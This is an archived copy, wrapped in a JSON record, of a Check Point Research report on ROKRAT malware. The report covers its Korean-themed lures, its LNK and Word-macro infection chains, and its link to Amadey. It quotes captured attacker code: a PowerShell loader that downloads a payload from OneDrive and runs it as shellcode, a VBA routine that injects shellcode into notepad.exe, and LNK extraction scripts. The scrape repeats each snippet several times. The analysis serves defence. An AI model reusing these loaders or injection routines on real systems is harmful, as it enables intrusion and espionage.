{ "id": "009464f7-8cba-445a-941c-07e45e7d1ed8", "created_at": "2026-04-09T02:22:42.711455Z", "updated_at": "2026-04-10T03:38:06.618393Z", "deleted_at": null, "sha1_hash": "7e612877e5c674dba43770826efbaad4e12f46f3", "title": "Chain Reaction: ROKRAT’s Missing Link", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 179411, "plain_text": "Chain Reaction: ROKRAT’s Missing Link\r\nBy etal\r\nPublished: 2023-05-01 · Archived: 2026-04-09 02:05:39 UTC\r\nKey findings\r\nCheck Point Research (CPR) continues to track the evolution of ROKRAT and its delivery methods.\r\nROKRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing\r\narchives containing LNK files that initiate multi-stage infection chains. This is another representation of a major\r\ntrend in the threat landscape, where APTs and cybercriminals alike attempt to overcome the blocking of macros from\r\nuntrusted sources. The first sample we will discuss below was first discovered in July 2022, the same month that\r\nMicrosoft began enforcing this new rule.\r\nThe lures used as part of the ROKRAT infections are largely focused on South Korean foreign and domestic affairs.\r\nMost of those lures are in Korean, suggesting the targets are Korean-speaking individuals.\r\nOur findings suggest that various multi-stage infection chains used to eventually load ROKRAT were utilized in other\r\nattacks, leading to the deployment of additional tools affiliated with the same actor. Those tools include another\r\ncustom backdoor, GOLDBACKDOOR, and the commodity malware Amadey.\r\nIntroduction\r\nFrom the many reports on APT37 in recent months, to Mandiant’s announcement on APT43, a lot of attention is currently\r\nfocused on North Korean threat actors – and with good reason. North Korea has a long history of attacking its southern\r\nneighbor, especially by means of cyber warfare which continues today. In this article, we describe a cluster of observed\r\nactivity that deploys ROKRAT, a tool previously attributed to a North Korean threat actor commonly referred to as APT37,\r\nInky Squid, RedEyes, Reaper or ScarCruft.\r\nIn previous years, ROKRAT infection chains usually involved a malicious Hangul Word Processor (HWP, a popular\r\ndocument format in South Korea) document with an exploit, or a Microsoft Word document with macros. While some\r\nROKRAT samples still use these techniques, we have observed a shift to delivering ROKRAT with LNK files disguised as\r\nlegitimate documents. This shift is not exclusive to ROKRAT but represents a larger trend that became very popular in 2022.\r\nIn July of that year, Microsoft began blocking macros in Office applications by default in an effort to minimize the spread of\r\nmalware, and the first malware sample we discuss was discovered in the same month.\r\nIn our report, we discuss various infection chains and lures used by APT37 in their recent attacks, and the resulting payloads\r\nof ROKRAT and Amadey. Finally, we dive deeply into a technical analysis of ROKRAT.\r\nWhile we were in the final stages of preparing this blogpost, another report containing a technical analysis of one of the\r\nROKRAT campaigns was published. While it overlaps with our findings to some extent, we believe that our report provides\r\nimportant information about additional campaigns by APT37, as well as a deep analysis of the ROKRAT malware.\r\nBackground\r\nFirst reported by Talos in April 2017, ROKRAT (also known as DOGCALL) has been consistently attributed to APT37.\r\nTypically, this tool was used to target government sectors in South Korea as well as journalists, activists, and North Korean\r\ndefectors. According to the initial report, one of the ROKRAT samples utilized Twitter as its Command and Control (C\u0026C)\r\ninfrastructure, while the other relied on Yandex and Mediafire. The latter sample more closely resembles how ROKRAT\r\noperates today, relying on cloud file storage services as a C\u0026C mechanism.\r\nOriginally supporting only Windows, over the years ROKRAT has adapted to other platforms, with macOS and Android\r\nversions discovered in the wild. The macOS version, also known as CloudMensis, was first described by ESET in July 2022.\r\nAlthough Android versions of ROKRAT have existed for a long time, InterLab and S2W both introduced a newer version of\r\nROKRAT on Android, known as RambleOn (Cumulus). All of this demonstrates that this malware is still being actively\r\ndeveloped and distributed.\r\nMany of the tools attributed to APT37 are custom-written tools like ROKRAT, including (but not limited to) the\r\nrecently reported M2RAT, Konni RAT, Chinotto, and GOLDBACKDOOR. However, the actors also use commodity\r\nmalware such as Amadey. Using commodity malware makes it more difficult to attribute the attack to a specific group, as\r\nit’s widely available and anyone can acquire it.\r\nAs documented in recent publications, the threat actors have been active lately. In February, AhnLab reported a new RAT\r\nnamed Map2RAT or M2RAT for short. This RAT utilizes steganography tricks by hiding executables inside JPEG files to\r\nevade detection. In March, Sekoia and ZScaler both published accounts of APT37’s use of phishing sites and PowerShell\r\nbackdoors, the latter of which led to the deployment of another implant named Chinotto.\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 1 of 15\n\nLures and Infection Chains\r\nOver the past four months, we observed multiple infection chains leading to ROKRAT deployment. In most cases, an LNK\r\nfile initiates the infection, although in a few a DOC file was used for the same purpose (the method in previous ROKRAT\r\nattacks). During our analysis of the ROKRAT infection chain, we came across a similar chain leading to the deployment of\r\nAmadey, a commercial RAT sold in underground forums. Although the nature of the attacks is different, we believe all of\r\nthose were crafted by the same actors.\r\nFigure 1 - Timeline of lures and infection chains.\r\nFigure 1 – Timeline of lures and infection chains.\r\nDecoy LNK Infection Chains\r\nIn April 2022, Stairwell published a detailed analysis of GOLDBACKDOOR, a malware utilized in a targeted attack against\r\nSouth Korean journalists. Stairwell provided a thorough analysis of an infection chain that utilizes large LNK files running\r\nPowerShell, leading to the execution of the newly discovered malware while dropping a decoy document. This technique is\r\na unique implementation of a publicly available tool called EmbedExeLnk.\r\nAlthough first linked to GOLDBACKDOOR, analysis of recent lures tied to APT37 suggests this technique has become a\r\nprominent method used to deliver another tool associated with the same actor, namely ROKRAT. The implementation of\r\nROKRAT and GOLDBACKDOOR loading mechanisms are so similar that differentiating between the two is only possible\r\nupon retrieving the payload.\r\nOver the last few months, we were able to identify multiple lures utilizing this unique implementation delivered in ZIP and\r\nISO archives. Only some of these lures were confirmed to lead to ROKRAT deployment. All of the lures used the theme of\r\nSouth Korean domestic and foreign affairs.\r\nJuly 2022 – National Assembly Committees\r\nThe earliest indication of the above-mentioned infection chain was found in a ZIP file named  (0722)상임위원회 및 상설특\r\n별위원회 위원 명단(최종).zip  ( (0722) Standing Committee and Standing Special Committee Member List\r\n(final).zip ). This ZIP file contains an LNK with the same name and looks very similar to the LNK loader that was used\r\nfor GOLDBACKDOOR.\r\nIn this case, a decoy HWP document is dropped and opened. The document contains information about committees in the\r\nNational Assembly, the South Korean parliament. Based on the timestamp of the ZIP archive, it appears that the document\r\nbecame publicly available on the National Assembly’s website and was weaponized within a single day. Unfortunately, we\r\nwere not able to get the end payload in this infection chain, though it is highly likely it was either GOLDBACKDOOR or\r\nROKRAT.\r\nFigure 2 - Decoy HWP document about committees in the South Korean National Assembly.\r\nFigure 2 – Decoy HWP document about committees in the South Korean National Assembly.\r\nJanuary 2023 – Projects in Libya\r\nAt the beginning of February 2023, we came across another new sample of ROKRAT. This time, the actors used a ZIP\r\narchive, named  projects in Libya.zip , which contains several stolen documents. In the malicious archive, there were\r\nthree benign files called  MFZ Executive Summary Korea.pdf ,  Proposed MOU GTE Korea.docx , and  Proposed MOU GTE\r\nKorea.pdf . The fourth file was a suspiciously large LNK, approximately 42.5 MB, masquerading as a PDF file\r\nnamed  Pipelines Profile (Elfeel- Sharara-Mellitah + Wafa - Mellitah).pdf . Unlike all of the other lures we saw,\r\nthis one was in English.\r\nAll the documents in this archive are connected to the Libyan Oil \u0026 Gas industry. The three benign documents are about a\r\nproject involving a Libyan oil company called Geotech Energy and a South Korean consultant company called Tundrabiz.\r\nThe decoy document that is opened after clicking the malicious LNK shows the profiling of an oil pipeline from 2005 by\r\nEnppi, an international contractor that specializes in projects in the oil and gas industries.\r\nFigure 3 - Pipelines Profile (Elfeel- Sharara-Mellitah + Wafa - Mellitah).pdf.\r\nFigure 3 – Pipelines Profile (Elfeel- Sharara-Mellitah + Wafa – Mellitah).pdf.\r\nFigure 4 - MFZ Executive Summary Korea.pdf.\r\nFigure 4 – MFZ Executive Summary Korea.pdf.\r\nApril 2023 – North Korea Diplomacy\r\nAt the beginning of April, we saw a similar infection chain from an ISO file that led to ROKRAT. The sample contained two\r\nmalicious LNKs inside named  북 외교관 선발파견 및 해외공관.lnk  ( Selection and Dispatch of North\r\nKorean Diplomats and Overseas Missions.lnk ) and  북한외교정책결정과정.lnk  ( North Korea foreign policy\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 2 of 15\n\ndecision-making process.lnk ). Both LNKs contain and drop decoy HWP files, which is a common document format in\r\nSouth Korea and is widely used by North Korean threat actors to distribute malware. The files are\r\nnamed  230401.hwp  and  230402.hwp , respectively. These names likely indicate the dates April 1 and April 2, 2023, just a\r\nfew days before the ISO archive was discovered. Both decoy documents contain articles regarding diplomacy and policy\r\ndecisions of South Korea toward North Korea.\r\nFigure 5 – North Korea’s Selected and Dispatch of Diplomats and Operation of Overseas Missions article by\r\nChulmin Han, Former North Korean diplomat in Africa (230401.hwp). Automatic translation on the right.\r\nApril 2023 – Korean Association for Public Administration\r\nOn April 19, another pair of LNKs were discovered. This time, there was no archive file; the LNKs were uploaded\r\nseparately to VirusTotal and were not given meaningful names. However, based on the pattern we observed, they were\r\nprobably named according to the PDF file they both contain:  2023년도 4월 29일 세미나.pdf  ( April 29, 2023\r\nSeminar.pdf ). This decoy PDF file details a seminar that it claims will happen on April 29, 2023, at the Korean Association\r\nfor Public Administration, and includes a Zoom link and itinerary.\r\nEven though the two LNKs dropped the same document and script, one file was 10 MB and the other nearly 50 MB, due to\r\ndifferent amounts of padding inside the LNK files. Unfortunately, at the time of analysis, the payload hosted on OneDrive\r\nhad already been taken down, so we are unsure of the final payload. However, we believe that it was probably ROKRAT or\r\nGOLDBACKDOOR.\r\nFigure 6 - Lure document 2023년도 4월 29일 세미나.pdf (April 29, 2023 Seminar.pdf).\r\nFigure 6 – Lure document 2023년도 4월 29일 세미나.pdf (April 29, 2023 Seminar.pdf).\r\nLNK Infection Chain Analysis\r\nAll of the LNKs discussed above lead to nearly the same infection chain. An example of the infection is depicted below, as\r\ndemonstrated in the “Projects in Libya” archive:\r\nFigure 7 - Infection chain for “Projects in Libya” lure.\r\nFigure 7 – Infection chain for “Projects in Libya” lure.\r\nClicking the malicious LNK file triggers the execution of a PowerShell, and initiates the following infection chain:\r\n1. The PowerShell extracts a document file from the LNK, drops it to the disk, and then opens it. This file is a decoy to\r\ntrick users into thinking they simply opened a normal PDF or HWP file.\r\n2. The PowerShell extracts a BAT script from the LNK, drops it to the disk, and executes it.\r\n$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath =\r\n'C:\\Users\\admin\\AppData\\Local\\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object\r\n{$_.length -eq 0x0002A8F60E} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte\r\n-TotalCount 03568692 -ReadCount 03568692; $pdfPath = 'C:\\Users\\admin\\AppData\\Local\\Temp\\230130.pdf'; sc\r\n$pdfPath ([byte[]]($pdfFile | select -Skip 003388)) -Encoding Byte; \u0026 $pdfPath; $exeFile = gc $lnkpath -Encoding\r\nByte -TotalCount 03571940 -ReadCount 03571940; $exePath = 'C:\\Users\\admin\\AppData\\Local\\Temp\\230130.bat';\r\nsc $exePath ([byte[]]($exeFile | select -Skip 03568692)) -Encoding Byte; \u0026 $exePath;\r\n$dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath =\r\n'C:\\Users\\admin\\AppData\\Local\\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0002A8F60E} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -\r\nEncoding Byte -TotalCount 03568692 -ReadCount 03568692; $pdfPath =\r\n'C:\\Users\\admin\\AppData\\Local\\Temp\\230130.pdf'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 003388)) -\r\nEncoding Byte; \u0026 $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 03571940 -ReadCount\r\n03571940; $exePath = 'C:\\Users\\admin\\AppData\\Local\\Temp\\230130.bat'; sc $exePath ([byte[]]($exeFile |\r\nselect -Skip 03568692)) -Encoding Byte; \u0026 $exePath;\r\n3. The BAT script executes a new PowerShell instance that downloads a payload from OneDrive, decodes it by taking\r\nthe first byte of the payload as a key, and XORs it with the remainder of the payload.\r\n4. The resulting payload is reflectively injected into PowerShell, causing it to run as a new thread.\r\n5. The shellcode decodes the ROKRAT portion of the payload with a four-byte XOR key and executes it.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 3 of 15\n\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072)\r\n$aa='[DllImport(\"kernel32.dll\")]public static extern IntPtr GlobalAlloc(uint b,uint c);'\r\n$b=Add-Type -MemberDefinition $aa -Name \"AAA\" -PassThru\r\n$abab = '[DllImport(\"kernel32.dll\")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);'\r\n$aab=Add-Type -MemberDefinition $abab -Name \"AAB\" -PassThru\r\n$c = New-Object System.Net.WebClient\r\n$d=\"https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalFOTHZFRV9DVU9iUFdnLXhPZG8xRXFYckU_ZT1BM1QwV\r\n$bb='[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint\r\ne,IntPtr f);'\r\n$ccc=Add-Type -MemberDefinition $bb -Name \"BBB\" -PassThru\r\n$ddd='[DllImport(\"kernel32.dll\")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);'\r\n$fff=Add-Type -MemberDefinition $ddd -Name \"DDD\" -PassThru\r\n$e=112\r\ndo {\r\ntry {\r\n$c.Headers[\"user-agent\"] = \"connnecting...\"\r\n$xmpw4=$c.DownloadData($d)\r\n$x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100)\r\n$old = 0\r\n$aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old)\r\nfor ($h = 1; $h -lt $xmpw4.Length; $h++)\r\n{ [System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4[0]) ) }\r\ntry { throw 1 }\r\ncatch {\r\n$handle=$ccc::CreateThread(0,0,$x0,0,0,0)\r\n$fff::WaitForSingleObject($handle, 500*1000) }\r\n$e=222 }\r\ncatch {\r\nsleep 11\r\n$e=112 }\r\n} while($e -eq 112)\r\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072)\r\n$aa='[DllImport(\"kernel32.dll\")]public static extern IntPtr GlobalAlloc(uint b,uint c);' $b=Add-Type -\r\nMemberDefinition $aa -Name \"AAA\" -PassThru $abab = '[DllImport(\"kernel32.dll\")]public static extern bool\r\nVirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);' $aab=Add-Type -MemberDefinition $abab -Name \"AAB\" -\r\nPassThru $c = New-Object System.Net.WebClient\r\n$d=\"https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalFOTHZFRV9DVU9iUFdnLXhPZG8xRXFYckU_ZT1BM1QwV\r\n$bb='[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint\r\ne,IntPtr f);' $ccc=Add-Type -MemberDefinition $bb -Name \"BBB\" -PassThru\r\n$ddd='[DllImport(\"kernel32.dll\")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);' $fff=Add-Type\r\n-MemberDefinition $ddd -Name \"DDD\" -PassThru $e=112 do { try { $c.Headers[\"user-agent\"] = \"connnecting...\"\r\n$xmpw4=$c.DownloadData($d) $x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100) $old = 0\r\n$aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old) for ($h = 1; $h -lt $xmpw4.Length; $h++) {\r\n[System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4[0]) ) } try {\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 4 of 15\n\nthrow 1 } catch { $handle=$ccc::CreateThread(0,0,$x0,0,0,0) $fff::WaitForSingleObject($handle, 500*1000) }\r\n$e=222 } catch { sleep 11 $e=112 } } while($e -eq 112)\r\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072)\r\n$aa='[DllImport(\"kernel32.dll\")]public static extern IntPtr GlobalAlloc(uint b,uint c);'\r\n$b=Add-Type -MemberDefinition $aa -Name \"AAA\" -PassThru\r\n$abab = '[DllImport(\"kernel32.dll\")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,\r\n$aab=Add-Type -MemberDefinition $abab -Name \"AAB\" -PassThru\r\n$c = New-Object System.Net.WebClient\r\n$d=\"https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalFOTHZFRV9DVU9iUFdnLXhPZG8xR\r\n$bb='[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,In\r\n$ccc=Add-Type -MemberDefinition $bb -Name \"BBB\" -PassThru\r\n$ddd='[DllImport(\"kernel32.dll\")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);'\r\n$fff=Add-Type -MemberDefinition $ddd -Name \"DDD\" -PassThru\r\n$e=112\r\ndo {\r\n try {\r\n $c.Headers[\"user-agent\"] = \"connnecting...\"\r\n $xmpw4=$c.DownloadData($d)\r\n $x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100)\r\n $old = 0\r\n $aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old)\r\n for ($h = 1; $h -lt $xmpw4.Length; $h++)\r\n { [System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4[\r\n try { throw 1 }\r\n catch {\r\n $handle=$ccc::CreateThread(0,0,$x0,0,0,0)\r\n $fff::WaitForSingleObject($handle, 500*1000) }\r\n $e=222 }\r\n catch {\r\n sleep 11\r\n $e=112 }\r\n} while($e -eq 112)\r\nClassic ROKRAT Infection Chain\r\nWhile adopting new behavior to keep up with the shifting threat landscape, ROKRAT operators still stick to some old habits.\r\nIn parallel to the newly identified method described above, ROKRAT is still deployed using malicious Word documents.\r\nIn December 2022, a malicious Word document named  사례비_지급의뢰서.doc  ( Case fee_Payment request.doc ) was\r\nsubmitted to VirusTotal. The document itself contains a short form to enter personal and banking information. However,\r\ncloser inspection of the document reveals references to the Ministry of Unification, a ministry in the South Korean\r\ngovernment that is responsible for guiding policy with North Korea and dealing with North Korean defectors, with the\r\nultimate goal of reuniting the two countries.\r\nFigure 8 - Infection chain for “Projects in Libya” lure.\r\nFigure 8 – Infection chain for “Projects in Libya” lure.\r\nOnce the user opens the malicious document and allows the macro to execute, the following infection chain is triggered:\r\n1. The macro checks and ensures it has access to the Visual Basic project by setting the AccessVBOM registry key to\r\nload additional code.\r\n2. The macro decodes a new VBA script, writes it to a new module in the macro, and then executes it. This is done\r\nwithout dropping any of the code to the disk.\r\n3. The second VBA script runs  notepad.exe  and injects shellcode into it.\r\n4. The shellcode runs inside  notepad.exe  and reaches out to OneDrive to download the ROKRAT payload and\r\nexecute it in memory.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nsrc_str = Array(\u0026H55, \u0026H8B, \u0026HEC, \u0026H83, \u0026HEC, \u0026H2C, \u0026H50, \u0026HE8, \u0026H4, \u003ctruncated\u003e...\r\n#If Win64 Then\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 5 of 15\n\nDim FSO As Object\r\nSet FSO = CreateObject(\"Scripting.FileSystemObject\")\r\nDim windowsDir As String\r\nwindowsDir = FSO.GetSpecialFolder(0)\r\nwindowsDir = windowsDir \u0026 \"\\SysWOW64\\notepad.exe\"\r\nReturnValue = CreateProcessA(0, windowsDir, 0, 0, False, 0, 0, 0, start, proc)\r\n#Else\r\nReturnValue = CreateProcessA(0, \"notepad.exe\", 0, 0, False, 0, 0, 0, start, proc)\r\n#End If\r\nPID = proc.dwProcessID\r\nIf PID Then hTargetProcHandle = OpenProcess(PROCESS_ALL_ACCESS, False, PID) Else Exit Sub\r\ndwCodeLen = \u0026H800\r\nshellAddr = VirtualAllocEx(hTargetProcHandle, ByVal 0, dwCodeLen, \u0026H3000,\r\nPAGE_EXECUTE_READWRITE)\r\nhGlobalMemory = GlobalAlloc(GHND, UBound(src_str))\r\nFor i = LBound(src_str) To UBound(src_str)\r\nbValue = src_str(i)\r\nRtlMoveMemory hGlobalMemory + i, bValue, 1\r\nNext i\r\nDim resultWriteProcess\r\nresultWriteProcess = WriteProcessMemory(hTargetProcHandle, shellAddr, hGlobalMemory, UBound(src_str) +\r\n1, ret)\r\nhThread = CreateRemoteThread(hTargetProcHandle, ByVal 0, 0, shellAddr, 0, 0, 0)\r\nsrc_str = Array(\u0026H55, \u0026H8B, \u0026HEC, \u0026H83, \u0026HEC, \u0026H2C, \u0026H50, \u0026HE8, \u0026H4, \u003ctruncated\u003e... #If Win64\r\nThen Dim FSO As Object Set FSO = CreateObject(\"Scripting.FileSystemObject\") Dim windowsDir As String\r\nwindowsDir = FSO.GetSpecialFolder(0) windowsDir = windowsDir \u0026 \"\\SysWOW64\\notepad.exe\" ReturnValue\r\n= CreateProcessA(0, windowsDir, 0, 0, False, 0, 0, 0, start, proc) #Else ReturnValue = CreateProcessA(0,\r\n\"notepad.exe\", 0, 0, False, 0, 0, 0, start, proc) #End If PID = proc.dwProcessID If PID Then hTargetProcHandle =\r\nOpenProcess(PROCESS_ALL_ACCESS, False, PID) Else Exit Sub dwCodeLen = \u0026H800 shellAddr =\r\nVirtualAllocEx(hTargetProcHandle, ByVal 0, dwCodeLen, \u0026H3000, PAGE_EXECUTE_READWRITE)\r\nhGlobalMemory = GlobalAlloc(GHND, UBound(src_str)) For i = LBound(src_str) To UBound(src_str) bValue =\r\nsrc_str(i) RtlMoveMemory hGlobalMemory + i, bValue, 1 Next i Dim resultWriteProcess resultWriteProcess =\r\nWriteProcessMemory(hTargetProcHandle, shellAddr, hGlobalMemory, UBound(src_str) + 1, ret) hThread =\r\nCreateRemoteThread(hTargetProcHandle, ByVal 0, 0, shellAddr, 0, 0, 0)\r\nsrc_str = Array(\u0026H55, \u0026H8B, \u0026HEC, \u0026H83, \u0026HEC, \u0026H2C, \u0026H50, \u0026HE8, \u0026H4, \u003ctruncated\u003e...\r\n #If Win64 Then\r\n Dim FSO As Object\r\n Set FSO = CreateObject(\"Scripting.FileSystemObject\")\r\n Dim windowsDir As String\r\n windowsDir = FSO.GetSpecialFolder(0)\r\n windowsDir = windowsDir \u0026 \"\\SysWOW64\\notepad.exe\"\r\n ReturnValue = CreateProcessA(0, windowsDir, 0, 0, False, 0, 0, 0, start, proc)\r\n #Else\r\n ReturnValue = CreateProcessA(0, \"notepad.exe\", 0, 0, False, 0, 0, 0, start, proc)\r\n #End If\r\n PID = proc.dwProcessID\r\n If PID Then hTargetProcHandle = OpenProcess(PROCESS_ALL_ACCESS, False, PID) Else Exit Sub\r\n dwCodeLen = \u0026H800\r\n shellAddr = VirtualAllocEx(hTargetProcHandle, ByVal 0, dwCodeLen, \u0026H3000, PAGE_EXECUTE_READWRITE\r\n hGlobalMemory = GlobalAlloc(GHND, UBound(src_str))\r\n For i = LBound(src_str) To UBound(src_str)\r\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\r\nPage 6 of 15\n\nbValue = src_str(i)\n RtlMoveMemory hGlobalMemory + i, bValue, 1\n Next i\n Dim resultWriteProcess\n resultWriteProcess = WriteProcessMemory(hTargetProcHandle, shellAddr, hGlobalMemory, UBound(src_\n hThread = CreateRemoteThread(hTargetProcHandle, ByVal 0, 0, shellAddr, 0, 0, 0)\nThe infection chain described here is extremely similar to what MalwareBytes reported in January 2021, which also\ndeployed ROKRAT by injecting shellcode into notepad.exe and loading the RAT in memory. However, the samples\ndescribed in the MalwareBytes research had compilation dates from 2019, whereas the new ROKRAT sample we discovered\nappears to have been compiled on December 21, 2022, only six days before the document was submitted to VirusTotal.\nAdditionally, there is another document recently discovered in April 2023 that appears to be part of the same infection chain,\nonly this time the target process for injection is mspaint.exe . The document references a few subjects such as Kim Jong-Un’s potential successor and North Korea’s nuclear weapon capabilities. Unfortunately, at the time of our analysis, the URL\nwas no longer replying to the request to download the payload. However, it is highly likely that this document was also\nintended to deliver ROKRAT.\nThe Amadey Connection\nAt the beginning of November 2022, a file called securityMail.zip was submitted to VirusTotal. This ZIP contained two\nLNKs which were both suspiciously large at just under 5 MB. The implementation of PowerShell commands within the two\nLNKs is unique and overlaps only with ROKRAT and GOLDBACKDOOR LNK infections. This specific infection chain,\nhowever, ends up deploying Amadey, a commodity malware available for sale on cybercrime forums. Amadey was linked in\nthe past to Konni, another cluster of activity that aligns with APT37.\nFigure 9 - Infection chain for the “Security Mail” lure.\n\nOpening either of these LNKs results in a\nsimilar flow:\nFigure 9 – Infection chain for the “Security Mail” lure.Opening either of these LNKs results in a similar flow:\n1. A PowerShell command extracts a decoy HTML file from the LNK and drops it to disk, in a similar manner to\nROKRAT infection chains:\nPlain text\nCopy to clipboard\nOpen code in new window\nEnlighterJS 3 Syntax Highlighter\n$dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq\n0x0000472484} | Select-Object -ExpandProperty FullName;if($lnkpath.length -eq 0) {$dirPath =\n\\\"$env:temp\\\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq\n0x0000472484} | Select-Object -ExpandProperty FullName;};$pdfFile = gc $lnkpath -Encoding Byte -TotalCount\n00090300 -ReadCount 00090300;$pdfPath = \\\"$env:temp\\securityMail_1031.html\\\"; sc $pdfPath ([byte[]]\n($pdfFile | select -Skip 004386)) -Encoding Byte; \u0026 $pdfPath;$exeFile = gc $lnkpath -Encoding Byte -\nTotalCount 04662404 -ReadCount 04662404;$exePath=\\\"$env:public\\11702.zip\\\";sc $exePath ([byte[]]($exeFile |\nselect -Skip 00090300)) -Encoding Byte;$shell = new-object -com shell.application;$zip =\n$shell.Namespace($exePath);if($zip.items().count -gt 0){$executemodule = $env:public + '\\' +\n$zip.items().item(0).name;$shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) | out-null;\nremove-item -path $exePath -force;$batPath=\\\"$env:public\\27868.bat\\\";$cmdline=\\\"rundll32.exe\n`\\\"$executemodule`\\\",Run`r`ndel /f /q %0\\\";sc $batPath $cmdline;start-process -filepath $batPath -windowstyle\nhidden;}\n$dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq\n0x0000472484} | Select-Object -ExpandProperty FullName;if($lnkpath.length -eq 0) {$dirPath =\n\\\"$env:temp\\\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq\n0x0000472484} | Select-Object -ExpandProperty FullName;};$pdfFile = gc $lnkpath -Encoding Byte -TotalCount\n00090300 -ReadCount 00090300;$pdfPath = \\\"$env:temp\\securityMail_1031.html\\\"; sc $pdfPath ([byte[]]\n($pdfFile | select -Skip 004386)) -Encoding Byte; \u0026 $pdfPath;$exeFile = gc $lnkpath -Encoding Byte -\nTotalCount 04662404 -ReadCount 04662404;$exePath=\\\"$env:public\\11702.zip\\\";sc $exePath ([byte[]]($exeFile |\nselect -Skip 00090300)) -Encoding Byte;$shell = new-object -com shell.application;$zip =\n$shell.Namespace($exePath);if($zip.items().count -gt 0){$executemodule = $env:public + '\\' +\n$zip.items().item(0).name;$shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) | out-null;\nremove-item -path $exePath -force;$batPath=\\\"$env:public\\27868.bat\\\";$cmdline=\\\"rundll32.exe\n`\\\"$executemodule`\\\",Run`r`ndel /f /q %0\\\";sc $batPath $cmdline;start-process -filepath $batPath -windowstyle\nhidden;}\nhttps://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/\nPage 7 of 15\n\n$dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.le\r\n2. This PowerShell also extracts a ZIP archive from the LNK, which contains a DLL. The DLL is then dropped to disk\r\nas  mfc100.dll .\r\n3. The PowerShell finally extracts a BAT script from the LNK as well, dropping it to disk and executing it.\r\n4. The BAT script runs the DLL with  rundll32.exe  and deletes itself.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nrundll32.exe \"C:\\Users\\Public\\mfc100.dll\",Run\r\ndel /f /q %0\r\nrundll32.exe \"C:\\Users\\Public\\mfc100.dll\",Run del /f /q %0\r\nrundll32.exe \"C:\\Users\\Public\\mfc100.dll\",Run\r\ndel /f /q %0\r\nAn initial analysis of the DLL file revealed that it is packed with Themida, a commercial code protection solution. After\r\nanalyzing a memory dump of its execution, we were able to confirm that this was in fact Amadey. The decoy HTML file\r\ncontains a fake login page for Kakao Bank, a popular bank in South Korea. Further analysis of the HTML revealed that it is\r\nnot used for password phishing, but to hide the threat actors’ intentions.\r\nFigure 10 - Fake Kakao Bank login page (automatic translation on the right).\r\nFigure 10 – Fake Kakao Bank login page (automatic translation on the right).\r\nROKRAT Technical Analysis\r\nROKRAT is just one of the many custom tools used by this threat actor, but is definitely versatile and powerful. ROKRAT\r\nprimarily focuses on running additional payloads and extensive data exfiltration. It relies on cloud infrastructure for C\u0026C\r\nfunctions, including DropBox, 